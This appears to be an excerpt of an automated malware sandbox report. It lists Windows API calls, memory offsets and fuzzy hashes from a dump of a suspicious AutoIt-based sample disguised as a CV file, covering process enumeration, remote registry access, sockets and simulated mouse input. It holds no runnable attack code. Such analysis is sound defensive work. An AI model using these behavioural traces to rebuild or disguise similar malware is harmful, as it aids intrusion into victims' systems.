                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 2178440468-0
                                                                                            • Opcode ID: 64e3e49ba9dd9bd359df9b4cf4de7dcf931c342ad28f1a1ccd9295f6efaf86e0
                                                                                            • Instruction ID: e6e9d36c44c6204144e84035d169d5e0df5af3c40be0a01b5479a50623f0238f
                                                                                            • Opcode Fuzzy Hash: 64e3e49ba9dd9bd359df9b4cf4de7dcf931c342ad28f1a1ccd9295f6efaf86e0
                                                                                            • Instruction Fuzzy Hash: 9B315B35600228EFDB20CF58EC84F5437A9FB4A314F2501A4F6198F6B1CBB1A891CB44
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001008F2
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00100918
                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0010091B
                                                                                            • SysAllocString.OLEAUT32(?), ref: 00100939
                                                                                            • SysFreeString.OLEAUT32(?), ref: 00100942
                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00100967
                                                                                            • SysAllocString.OLEAUT32(?), ref: 00100975
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                            • String ID:
                                                                                            • API String ID: 3761583154-0
                                                                                            • Opcode ID: 827aa80e1f31bfb680c24569d658ba58d803bd22bb86a77adcf974107a1e8db9
                                                                                            • Instruction ID: 52f294c8a4103b028c3bd087395f4a8c9ee92ba4579285dabef8ea89eb5ae257
                                                                                            • Opcode Fuzzy Hash: 827aa80e1f31bfb680c24569d658ba58d803bd22bb86a77adcf974107a1e8db9
                                                                                            • Instruction Fuzzy Hash: 23219476601209AFDF119F68DC84EBB73ACFB09364B048126F949DB2A1D7B0EC418760
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wcsnicmp
                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                            • API String ID: 1038674560-2734436370
                                                                                            • Opcode ID: 439c97c00215113e477a5bef32bc28c59e8cd7e1d446899255eb888cec63de9c
                                                                                            • Instruction ID: 12d5c09b8ad389c26d62fb70fbc8b4259b9d91bb0c3e96c283f94256c26c503a
                                                                                            • Opcode Fuzzy Hash: 439c97c00215113e477a5bef32bc28c59e8cd7e1d446899255eb888cec63de9c
                                                                                            • Instruction Fuzzy Hash: 10213A3120465167D225AB349C1AEFB7398EF65300F60402AF986E71C2EBF19942C3A5
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001009CB
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001009F1
                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 001009F4
                                                                                            • SysAllocString.OLEAUT32 ref: 00100A15
                                                                                            • SysFreeString.OLEAUT32 ref: 00100A1E
                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00100A38
                                                                                            • SysAllocString.OLEAUT32(?), ref: 00100A46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                            • String ID:
                                                                                            • API String ID: 3761583154-0
                                                                                            • Opcode ID: 01ba74cf17f593d18767bbed86c533c73e7f9a0db86a2fd2dd0c3517c84263b6
                                                                                            • Instruction ID: 21efc35959d39f7887d6bca5fff8f8bb39cfa51882fc81ef70b07e47fbaef5e5
                                                                                            • Opcode Fuzzy Hash: 01ba74cf17f593d18767bbed86c533c73e7f9a0db86a2fd2dd0c3517c84263b6
                                                                                            • Instruction Fuzzy Hash: 21216279200204AFDB11DFA8DC88DAA77ECEF4D360B058125F949CB6A1DBB0EC818764
                                                                                            APIs
                                                                                              • Part of subcall function 000DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000DD1BA
                                                                                              • Part of subcall function 000DD17C: GetStockObject.GDI32(00000011), ref: 000DD1CE
                                                                                              • Part of subcall function 000DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 000DD1D8
                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0012A32D
                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0012A33A
                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0012A345
                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0012A354
                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0012A360
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                            • String ID: Msctls_Progress32
                                                                                            • API String ID: 1025951953-3636473452
                                                                                            • Opcode ID: a1955d9bacd981c7b92de594b4deca94b7721855b14f72c2a89a605f07f8371d
                                                                                            • Instruction ID: 7eca6f9f47e87e585a95b60f85492453d06728fc7e2f8fe738a5a7544186fe99
                                                                                            • Opcode Fuzzy Hash: a1955d9bacd981c7b92de594b4deca94b7721855b14f72c2a89a605f07f8371d
                                                                                            • Instruction Fuzzy Hash: F01163B1150229BFEF159FA4DC85EE77F6DFF09798F014115BA08A6060C7729C21DBA4
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 000DCCF6
                                                                                            • GetWindowRect.USER32(?,?), ref: 000DCD37
                                                                                            • ScreenToClient.USER32(?,?), ref: 000DCD5F
                                                                                            • GetClientRect.USER32(?,?), ref: 000DCE8C
                                                                                            • GetWindowRect.USER32(?,?), ref: 000DCEA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                            • String ID:
                                                                                            • API String ID: 1296646539-0
                                                                                            • Opcode ID: 33001a4889fca62513945fbf51669465389d7148de74b71afe6a084922d964ca
                                                                                            • Instruction ID: 32583967f4a141f5d6a72d62ca7163150c38ca29187c64f9e969051f6da241eb
                                                                                            • Opcode Fuzzy Hash: 33001a4889fca62513945fbf51669465389d7148de74b71afe6a084922d964ca
                                                                                            • Instruction Fuzzy Hash: 50B10979A0034ADBDF14CFA8C580BEDBBB1FF08350F14952AEC59AB254DB70A950DB64
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00121C18
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00121C26
                                                                                            • __wsplitpath.LIBCMT ref: 00121C54
                                                                                              • Part of subcall function 000E1DFC: __wsplitpath_helper.LIBCMT ref: 000E1E3C
                                                                                            • _wcscat.LIBCMT ref: 00121C69
                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00121CDF
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00121CF1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                            • String ID:
                                                                                            • API String ID: 1380811348-0
                                                                                            • Opcode ID: b2ba6bcb4ac9b25d7023cd9bc7ca3edc2236a1a87d7e3372ac17c8586f731fed
                                                                                            • Instruction ID: 9f1b556aa24edff3c72da5e6d63433a7fddf1f48da79157fef74d8aeb28f402e
                                                                                            • Opcode Fuzzy Hash: b2ba6bcb4ac9b25d7023cd9bc7ca3edc2236a1a87d7e3372ac17c8586f731fed
                                                                                            • Instruction Fuzzy Hash: CB516D71104340AFD720EF64D885EAFB7E8EF88754F00492EF58997252EB70DA55CBA2
                                                                                            APIs
                                                                                              • Part of subcall function 00123C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00122BB5,?,?), ref: 00123C1D
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001230AF
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001230EF
                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00123112
                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0012313B
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0012317E
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0012318B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                            • String ID:
                                                                                            • API String ID: 3451389628-0
                                                                                            • Opcode ID: b1f8fff73b4be842c3a69defb192c977896c6541c1e9dad4dfbac259b7b91e58
                                                                                            • Instruction ID: 355b6b4f1b3d49ffff908e40d6ed3a535481e67eff4c8d106072fb77b8be2e3d
                                                                                            • Opcode Fuzzy Hash: b1f8fff73b4be842c3a69defb192c977896c6541c1e9dad4dfbac259b7b91e58
                                                                                            • Instruction Fuzzy Hash: B2516831208300AFD704EF64D895EAEBBE9FF89300F04491DF595872A2DB75EA15CB52
                                                                                            APIs
                                                                                            • GetMenu.USER32(?), ref: 00128540
                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00128577
                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0012859F
                                                                                            • GetMenuItemID.USER32(?,?), ref: 0012860E
                                                                                            • GetSubMenu.USER32(?,?), ref: 0012861C
                                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0012866D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Item$CountMessagePostString
                                                                                            • String ID:
                                                                                            • API String ID: 650687236-0
                                                                                            • Opcode ID: f00bc0be347b90e1a06696762026bc9a4f47e06bd280132ad455c7870c298f5d
                                                                                            • Instruction ID: c842d2a821d2e256cac1c287b7cdd3b9db8b6d40aec2ce33052f0b3ca24c4957
                                                                                            • Opcode Fuzzy Hash: f00bc0be347b90e1a06696762026bc9a4f47e06bd280132ad455c7870c298f5d
                                                                                            • Instruction Fuzzy Hash: DB519C75A01225AFCF11EFA8D845AEEB7F5FF48310F154469E905BB392CB70AE418B90
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 00104B10
                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00104B5B
                                                                                            • IsMenu.USER32(00000000), ref: 00104B7B
                                                                                            • CreatePopupMenu.USER32 ref: 00104BAF
                                                                                            • GetMenuItemCount.USER32(000000FF), ref: 00104C0D
                                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00104C3E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                            • String ID:
                                                                                            • API String ID: 3311875123-0
                                                                                            • Opcode ID: a44921e346d87adec595048b990a7bc31721682d16f935dbe1a0e09f412f1095
                                                                                            • Instruction ID: ea8467c03274a314ee188076e5cd179d60ac75a474e1c1de36ebfdaa10a3208d
                                                                                            • Opcode Fuzzy Hash: a44921e346d87adec595048b990a7bc31721682d16f935dbe1a0e09f412f1095
                                                                                            • Instruction Fuzzy Hash: 805114B0601209EFEF24CF64D9C8BADBBF4AF15304F108159E6959B2D0D7F19A80CB51
                                                                                            APIs
                                                                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00118E7C
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118E89
                                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00118EAD
                                                                                            • #16.WSOCK32(?,?,00000000,00000000), ref: 00118EC5
                                                                                            • _strlen.LIBCMT ref: 00118EF7
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118F6A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_strlenselect
                                                                                            • String ID:
                                                                                            • API String ID: 2217125717-0
                                                                                            • Opcode ID: f9c2882c4f4ec74eed9a260cc57ce57f788625f52f30ced9bb62287049102f96
                                                                                            • Instruction ID: d38523984d8daa1d9de89e80b17ea11bb514c4e6ae10868662b88452499a5a01
                                                                                            • Opcode Fuzzy Hash: f9c2882c4f4ec74eed9a260cc57ce57f788625f52f30ced9bb62287049102f96
                                                                                            • Instruction Fuzzy Hash: C141B471500105AFCB18EBA4DD95FEEB7B9AF58314F108669F51A972D2DF309E80CB60
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • BeginPaint.USER32(?,?,?), ref: 000DAC2A
                                                                                            • GetWindowRect.USER32(?,?), ref: 000DAC8E
                                                                                            • ScreenToClient.USER32(?,?), ref: 000DACAB
                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000DACBC
                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 000DAD06
                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0013E673
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                            • String ID:
                                                                                            • API String ID: 2592858361-0
                                                                                            • Opcode ID: 3528adc78890acf939dbb46cd8fbd27d6c5d0f182719294bb94ccc085adf4825
                                                                                            • Instruction ID: 3b122bc2e9b353ef3d029ed7354047a163f85af36aead44ee40d630621b8de5b
                                                                                            • Opcode Fuzzy Hash: 3528adc78890acf939dbb46cd8fbd27d6c5d0f182719294bb94ccc085adf4825
                                                                                            • Instruction Fuzzy Hash: 0441D271204300AFC710DF24DC84FBA7BE9EF56330F14026AF9A4972A1D3719985DB62
                                                                                            APIs
                                                                                            • ShowWindow.USER32(00181628,00000000,00181628,00000000,00000000,00181628,?,0013DC5D,00000000,?,00000000,00000000,00000000,?,0013DAD1,00000004), ref: 0012E40B
                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 0012E42F
                                                                                            • ShowWindow.USER32(00181628,00000000), ref: 0012E48F
                                                                                            • ShowWindow.USER32(00000000,00000004), ref: 0012E4A1
                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 0012E4C5
                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0012E4E8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 642888154-0
                                                                                            • Opcode ID: 3a752d3ef5ebd62b662c2722f0b309d50b19bc7ef230ed3479746a395e373985
                                                                                            • Instruction ID: f743a8ef51d4391f2dc312b5dfb0e156fb9a831251e2ebbb03dc19c3ee98e75a
                                                                                            • Opcode Fuzzy Hash: 3a752d3ef5ebd62b662c2722f0b309d50b19bc7ef230ed3479746a395e373985
                                                                                            • Instruction Fuzzy Hash: FF416034601190EFDB26DF24E499F947BE1FF0A304F1881A9EA58CF6A2C731E861CB51
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 001098D1
                                                                                              • Part of subcall function 000DF4EA: std::exception::exception.LIBCMT ref: 000DF51E
                                                                                              • Part of subcall function 000DF4EA: __CxxThrowException@8.LIBCMT ref: 000DF533
                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00109908
                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00109924
                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0010999E
                                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001099B3
                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 001099D2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                            • String ID:
                                                                                            • API String ID: 2537439066-0
                                                                                            • Opcode ID: 1ed5b827fdc429bd5c5256d7162d2e1c443c259adde58aca04a08ad816e28eb3
                                                                                            • Instruction ID: 299dddfa121afadbe5954131558296aed06d86caf4dd8c3ec5e1fe9e82c5b296
                                                                                            • Opcode Fuzzy Hash: 1ed5b827fdc429bd5c5256d7162d2e1c443c259adde58aca04a08ad816e28eb3
                                                                                            • Instruction Fuzzy Hash: 37316175A00205EBDF10EF94DC85EAEB7B8FF85710B1480A9F905AB296D770DA50CBA0
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,001177F4,?,?,00000000,00000001), ref: 00119B53
                                                                                              • Part of subcall function 00116544: GetWindowRect.USER32(?,?), ref: 00116557
                                                                                            • GetDesktopWindow.USER32 ref: 00119B7D
                                                                                            • GetWindowRect.USER32(00000000), ref: 00119B84
                                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00119BB6
                                                                                              • Part of subcall function 00107A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00107AD0
                                                                                            • GetCursorPos.USER32(?), ref: 00119BE2
                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00119C44
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
